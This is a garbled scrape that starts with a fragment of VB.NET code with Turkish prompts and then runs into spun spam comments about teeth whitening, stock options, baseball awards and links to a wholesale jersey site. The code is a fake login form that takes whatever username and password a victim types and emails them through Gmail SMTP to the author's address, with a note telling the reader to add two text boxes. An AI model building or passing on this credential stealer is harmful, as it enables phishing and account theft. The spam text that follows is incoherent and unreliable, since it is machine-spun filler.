MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Kendi Gmail Adresin", "Gmail Şifren")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail Adresin")
mail.To.Add("Gmail Adresin")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Burayada Butona Basıldıktan Sonra Ekranda Çıkacak Yazı")
MsgBox("Burada Üsttekiyle Aynı")

2Adet Text Box Eklemeyi Unutmayınız
Hello. And Bye.
Hello. And Bye.
It is good idea.
To get your teeth whiter, make certain you don't consume any water which has fluoride or use any toothpaste which includes fluoride being an component. These trades provide stability for our daily cashflow (from the trades done in the morning Short Term Trading Lab), and Net Worth Growth, our"getting rich' account, respectively.Berkman Signing Will Allow Rangers To Solve Infield Situation RealGM WiretapNow that the Rangers have signed Lance Berkman, they can focus on the right side of their infield. I began to look specifically for thosestocks which were volatile, yet more or less predictable which could be used to temporarilyreplace covered calls as my medium term strategy of choice. Protects babys mind casually all year round. Cheap does not automatically mean in the lowest ailment.GreenLaserToner.Posey received 27 of 32 first place votes and 422 points from the Baseball Writers' Association of America, outdistancing 2011 winner Ryan Braun&nbsp;of the Brewers, Wholesale Jerseys China,Cheap NFL Jerseys China Wholesale,Cheap NFL Jerseys Wholesale, who was second with 285 points. Here, for example, you see a stocktrading between $32 and $42, presently resting in the middle of the channel. As the premium began to dry up,I found writing covered calls more and more difficult.Posey received 27 of 32 first place votes and 422 points from the Baseball Writers' Association of America, outdistancing 2011 winner Ryan Braun&nbsp;of the Brewers, who was second with 285 points.Typically referred to as a 'long straddle', the position allows us to profit no matter WHICHway the stock moves, usually dumping the losing side of the straddle when the movementdirection becomes evident.<br>Visit my site:https://www.cheapnfljerseys-wholesale.com/
When you spend some time to investigate the goods before you invest your hard earned money to them, you are certain to find a quality merchandise a whole lot faster and without spending all the dollars.Although the firm produces a great deal of Ugg Jimmy Choo, together with, needless to say, these are typically extremely popular; there exists a selection of trainers for the relaxation.For more information pertaining to printer ink and toner cartridges I propose you visiting 50, then just sit back and allow your stock to becalled away from you for some very nice profits, indeed!Now, that was a good thing, because I had burned my bridges I HAD to make a go of it! As Ireflect on those times, I'm really thankful for my very good run of LUCK! This could haveturned out disastrously! The perspective of time (not to mention some unforgettableexperiences) has allowed me to learn that no market, good or bad lasts forever and the onlyconstant is change. Just follow these few tips and enjoy your move!But perhaps we should rewind a couple of years, Cheap Jerseys China Wholesale, so you can really take some time to prepare, and choose the kind of college experience that will work best for you and your goals.Our darling small Infant little one hat is being a consequence sweet and then for your Little one Woman. Bottom line,Cheap Jerseys Sale,this stock is moving a lot but going basically sideways. The company had only 15 employees.Banah Sugar International Group Inc. However there is no argument that acquiring the most effective academic pieces adds a lot throughout the event.The Fiery McEnroe Versus The "Ice" Borg In WimbledonThe 1981 Wimbledon Men's final is considered as one of the greatest title matches in Wimbledon history.You need to make sure that your household and your home are protected,Wholesale Jerseys Cheap, but you also need to ensure that the insurance policy you have isn’t really simply a bottom of the barrel piece of paper which says you’re protected.<br>Visit my sitehttps://www.cheapnfljerseys-wholesale.com/
!ENDVALUE!